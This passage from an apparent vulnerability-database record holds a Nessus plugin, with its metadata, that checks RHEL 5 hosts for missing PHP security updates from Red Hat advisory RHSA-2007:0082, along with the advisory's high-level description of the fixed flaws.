and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"$Revision: 1.18 $\");\n script_cvs_date(\"$Date: 2016/12/29 15:35:20 $\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0906.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0907.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0908.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0909.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0910.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1380.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1701.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1825.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2007-0082.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0082\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "title": "RHEL 5 : php (RHSA-2007:0082)", "type": "nessus", "viewCount": 4}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2017-10-29T13:33:19"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial of service attack by submitting an input variable with a deeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.", "edition": 2, "enchantments": {}, "hash": "30579c8e616fa8a68560958f94244aa397394aa798215ab7ab479128cec9b84a", "hashmap": [{"hash": "141eb5e5e7f7efcaf70f35531014315a", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a29e0c952ea4d93d5908b4afdfab89", "key": "sourceData"}, {"hash": "5ed89809cd59db22c6c4bc5e691596fe", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "2ab893896877901f3ca480db3bed6e02", "key": "references"}, {"hash": "851dbb0f33630b51c53f0d6ca1a06fc3", "key": "modified"}, {"hash": "ddc199dc1dacc50b088328ca4eddaf1b", "key": "published"}, {"hash": "c986b43752781caa839decc2a0741192", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b44f6da67fcb87f1db557fc9f19e20c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "2e53e2231fd68fdc02c53c3b32b818ad", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "id": "REDHAT-RHSA-2007-0082.NASL", "lastseen": "2016-12-30T02:13:20", "modified": "2016-12-29T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.2", "pluginID": "25317", "published": "2007-05-25T00:00:00", "references": ["https://www.redhat.com/security/data/cve/CVE-2007-0907.html", "https://www.redhat.com/security/data/cve/CVE-2007-1825.html", "https://www.redhat.com/security/data/cve/CVE-2007-0910.html", "https://www.redhat.com/security/data/cve/CVE-2007-0988.html", "https://www.redhat.com/security/data/cve/CVE-2007-1380.html", "https://www.redhat.com/security/data/cve/CVE-2007-0906.html", "https://www.redhat.com/security/data/cve/CVE-2007-0908.html", "https://www.redhat.com/security/data/cve/CVE-2007-1285.html", "https://www.redhat.com/security/data/cve/CVE-2007-1701.html", "https://www.redhat.com/security/data/cve/CVE-2007-0909.html", "http://rhn.redhat.com/errata/RHSA-2007-0082.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"$Revision: 1.18 $\");\n script_cvs_date(\"$Date: 2016/12/29 15:35:20 $\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0906.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0907.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0908.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0909.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0910.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1380.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1701.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1825.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2007-0082.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0082\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) 